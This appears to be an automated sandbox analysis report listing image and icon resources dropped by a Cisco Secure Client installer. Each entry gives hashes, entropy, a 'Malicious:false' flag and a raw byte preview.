                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-HVVEE.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-ICM5J.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-IDS57.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-IK4TB.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-JBVDS.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-JL16B.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-K1EQK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-K20IL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-KAE5H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-KV17J.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-LGG9R.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-LH9NF.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-LJC25.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
